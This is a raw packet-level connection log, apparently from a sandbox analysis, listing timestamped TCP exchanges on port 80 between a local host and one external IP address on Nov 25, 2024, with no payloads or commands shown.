Nov 25, 2024 07:09:05.785975933 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.790529013 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.790644884 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.790674925 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.790687084 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.795283079 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.795341015 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.795424938 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.795618057 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.800165892 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.800216913 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.800239086 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.800296068 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.804848909 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.804897070 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.804953098 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.805017948 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.809634924 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.809686899 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.809772015 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.809819937 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.814425945 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.814479113 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.814552069 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.814757109 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.819224119 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.819283962 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.819328070 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.819375038 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.823983908 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.824127913 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.824198008 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.828741074 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.828795910 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.828852892 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.831075907 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.833540916 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.833594084 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.833646059 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.833693981 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.838402033 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.838495016 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.838660955 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.843147993 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.843214035 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.843272924 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.847896099 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.848001003 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.848067045 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.852762938 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.852792025 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.852813005 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.852843046 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.857455015 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.857506037 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.857513905 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.857557058 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.960282087 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.960340977 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.960402966 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.960450888 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.962131977 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.962181091 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.962201118 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.962245941 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.965770960 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.965858936 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.965890884 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.965934038 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.969408989 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.969454050 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.969533920 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.969579935 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.973050117 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.973105907 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.973201036 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.973267078 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.976597071 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.976646900 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.976737022 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
Nov 25, 2024 07:09:05.976783991 CET | 49743 | 80 | 192.168.2.4 | 103.83.194.50
Nov 25, 2024 07:09:05.980114937 CET | 80 | 49743 | 103.83.194.50 | 192.168.2.4
                                                                Nov 25, 2024 07:09:05.980165005 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.980232954 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.980279922 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.983459949 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.983508110 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.983601093 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.983645916 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.986825943 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.986872911 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.986973047 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.987016916 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.990297079 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.990346909 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.990525961 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.990573883 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.993856907 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.993910074 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.993921995 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.993968010 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.996768951 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.996819019 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:05.996900082 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:05.996948004 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.000081062 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.000171900 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.000191927 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.000235081 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.003393888 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.003443956 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.003485918 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.003531933 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.006699085 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.006746054 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.006849051 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.006896973 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.010036945 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.010080099 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.010126114 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.010171890 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.013349056 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.013398886 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.013439894 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.013488054 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.016664982 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.016716957 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.016757965 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.016803980 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.020020008 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.020067930 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.020133018 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.020180941 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.023288965 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.023338079 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.023411036 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.023456097 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.026612997 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.026670933 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.026751995 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.026798964 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.029925108 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.029969931 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.030013084 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.030071974 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.033226013 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.033265114 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.033272028 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.033304930 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.036555052 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.036603928 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.036621094 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.036665916 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.040893078 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.041130066 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.041178942 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.043328047 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.043382883 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.043436050 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.046475887 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.046596050 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.046643019 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.049788952 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.049909115 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.049967051 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.053114891 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.053263903 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.053329945 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.056638002 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.056696892 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.056699991 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.056737900 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.059748888 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.059812069 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.059847116 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.060148001 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.063054085 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.063160896 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.063211918 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.066584110 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.066695929 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.066855907 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.069739103 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.069849014 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.069901943 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.072995901 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.073075056 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.073129892 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.076316118 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.076452017 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.076513052 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.081716061 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.081731081 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.081794977 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.083107948 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.083122969 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.083158970 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.083237886 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.171613932 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.171703100 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.171717882 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.171770096 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.172494888 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.172529936 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.172580004 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.174526930 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.174627066 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.174676895 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.176898003 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.177005053 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.177054882 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.179383039 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.179399967 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.179447889 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.181649923 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.181763887 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.181813955 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.183967113 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.184026957 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.184067965 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.184789896 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.186320066 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.186371088 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.186427116 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.186476946 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.188601017 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.188755035 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.188796997 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.188808918 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.191015005 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.191040993 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.191099882 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.193097115 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.193213940 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.193265915 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.195342064 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.195480108 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.195525885 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.197566986 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.197674036 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.197721004 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.199646950 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.199701071 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.199743032 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.200795889 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.201828957 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.201874018 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.201925039 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.203926086 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.203978062 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.204020023 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.204071999 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.206089973 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.206166029 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.206208944 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.208204985 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.208283901 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.208327055 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.210305929 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.210357904 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.210427046 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.210591078 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.212346077 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.212481976 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.212558985 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.214413881 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.214520931 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.214567900 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.216479063 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.216548920 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.216583967 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.216630936 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.218592882 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.218657017 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.218683958 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.218729019 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.220657110 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.220772028 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.220793009 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.220818043 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.222721100 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.222898960 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.222934008 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.222958088 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.224792957 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.224843979 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.224921942 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.225114107 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.226861954 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.227051973 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.227113962 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.229091883 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.229149103 CET4974380192.168.2.4103.83.194.50
                                                                Nov 25, 2024 07:09:06.229171038 CET8049743103.83.194.50192.168.2.4
                                                                Nov 25, 2024 07:09:06.229343891 CET4974380192.168.2.4103.83.194.50
Nov 25, 2024 07:09:06.231044054 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.231092930 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:06.231134892 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.231184959 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:06.233131886 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.233272076 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.233334064 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:06.235198975 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.235256910 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:06.235325098 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.235380888 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:06.237303972 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.237377882 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.237401009 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:06.237435102 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:06.239537954 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.239586115 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:06.239667892 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.239708900 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:06.241540909 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.241609097 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.241667986 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:06.243493080 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.243630886 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:06.243660927 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.243700981 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:06.245575905 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.245629072 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:06.245701075 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.245749950 CET  49743  80     192.168.2.4      103.83.194.50
Nov 25, 2024 07:09:06.247648954 CET  80     49743  103.83.194.50    192.168.2.4
Nov 25, 2024 07:09:06.247771025 CET  80     49743  103.83.194.50    192.168.2.4
